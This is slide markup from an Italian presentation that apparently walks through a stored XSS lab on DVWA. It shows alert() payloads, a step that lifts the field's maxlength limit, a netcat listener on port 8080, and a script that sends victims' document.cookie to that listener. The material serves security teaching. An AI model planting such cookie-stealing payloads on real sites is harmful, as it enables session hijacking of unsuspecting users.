                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Ora, se cambiamo pagina nel DVWA e poi torniamo alla pagina di Stored XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>vedremo di nuovo il popup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Cancelleremo questo script dalla pagina e poi utilizzeremo un nuovo script per recuperare i cookie di sessione delle vittime e inviarli a un server sotto il nostro controllo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="622594" y="160020"/>
            <a:ext cx="17665406" cy="1672590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Modificheremo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;script&gt;alert("WXSS");//&lt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;script&gt;alert("You’ve been hacked");//&lt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1797054" y="2215661"/>
            <a:ext cx="7960935" cy="2342858"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2342858" w="7960935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7960934" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7960934" y="2342857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2342857"/>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3756" y="5303975"/>
            <a:ext cx="9612966" cy="3768090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>La pagina XSS Stored presenta un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>limite di  50 caratter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>nel </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>campo di testo del messaggio nel codice HTML. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Per far funzionare il nostro script, accederemo alla source e modificheremo il parametro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>maxlength</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>della proprietà </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>maxarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, aumentando il limite a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>100 caratteri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="353756" y="3575438"/>
            <a:ext cx="8356402" cy="167259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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Prima di ciò, però, dobbiamo ospitare un falso server web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Quindi apriremo una connessione con</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>netcat sulla nostra porta 8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="8C52FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="12491064" y="3184656"/>
            <a:ext cx="9536472" cy="11016828"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12715296" cy="14689104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="2514208"/>
              <a:ext cx="12715296" cy="12174896"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="12174896" w="12715296">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12715296" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12715296" y="12174896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="12174896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="4654639" y="0"/>
              <a:ext cx="4970597" cy="4759347"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="4759347" w="4970597">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4970597" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4970597" y="4759347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4759347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9966722" y="6557933"/>
            <a:ext cx="7261517" cy="2135137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2135137" w="7261517">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7261517" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7261517" y="2135137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2135137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="-13280" t="0" r="-5443" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 8" id="8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10380343" y="4013459"/>
            <a:ext cx="3452735" cy="853698"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="853698" w="3452735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3452735" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3452735" y="853698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="853698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="649788" y="240008"/>
            <a:ext cx="7521192" cy="3253840"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10028255" cy="4338453"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="-9525"/>
              <a:ext cx="10028255" cy="1990725"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPts val="5880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed"/>
                </a:rPr>
                <a:t>4.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4900">
                  <a:solidFill>
                    <a:srgbClr val="CB6CE6"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Condensed Ultra-Bold"/>
                </a:rPr>
                <a:t> Creazione server e modifica pagina XSS Stored</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3718905"/>
              <a:ext cx="9685296" cy="609388"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" marL="0" indent="0" lvl="0">
                <a:lnSpc>
                  <a:spcPts val="3814"/>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016928" y="-1482035"/>
            <a:ext cx="16623526" cy="15917026"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="15917026" w="16623526">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16623526" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16623526" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15917025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="637905" y="7085866"/>
            <a:ext cx="4998744" cy="1672590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Effettuando l'accesso alla pagina XSS stored, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>riceveremo i cookie del malcapitato sul nostro falso server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="6909574" y="6179158"/>
            <a:ext cx="11127429" cy="3385960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3385960" w="11127429">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11127429" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11127429" y="3385960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3385960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="637905" y="2157068"/>
            <a:ext cx="17650095" cy="418719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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Poi useremo questo script nel campo di testo del messaggio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>&lt;script&gt;window.location='http://127.0.0.1:8080/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>cookie='+document.cookie&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Utilizzando questo script, i cookie degli utenti verranno reindirizzati al nostro server situato </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>sulla porta 8080 grazie alla funzionalità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>, mentre la funzionalità </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> recupererà tutti i cookie di sessione associati alla pagina corrente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9462953" y="1825652"/>
            <a:ext cx="8115300" cy="2371036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2371036" w="8115300">
                <a:moveTo>
